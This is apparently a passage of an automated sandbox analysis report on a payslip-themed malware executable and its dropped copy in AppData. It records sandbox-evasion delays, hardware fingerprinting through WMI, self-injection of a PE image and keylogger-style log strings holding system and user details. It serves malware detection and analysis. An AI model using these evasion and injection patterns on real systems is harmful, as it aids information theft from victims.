                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597529Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596233Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595522Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595136Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595025Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598762
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596025
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594936
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594609
                    Source: sgxIb.exe, 00000008.00000002.4121600750.00000000010C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: Payslip_October_2024.exe, 00000002.00000002.4121114729.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1887034181.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Memory written: C:\Users\user\Desktop\Payslip_October_2024.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Process created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q3<b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q9<b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>{Win}rTHcq
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <html>Time: 11/18/2024 19:04:53<br>User Name: user<br>Computer Name: 724536<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.69<br><hr><b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>{Win}r</html>
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q8<b>[ Program Manager]</b> (05/11/2024 05:57:33)<br>{Win}THcq
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Queries volume information: C:\Users\user\Desktop\Payslip_October_2024.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
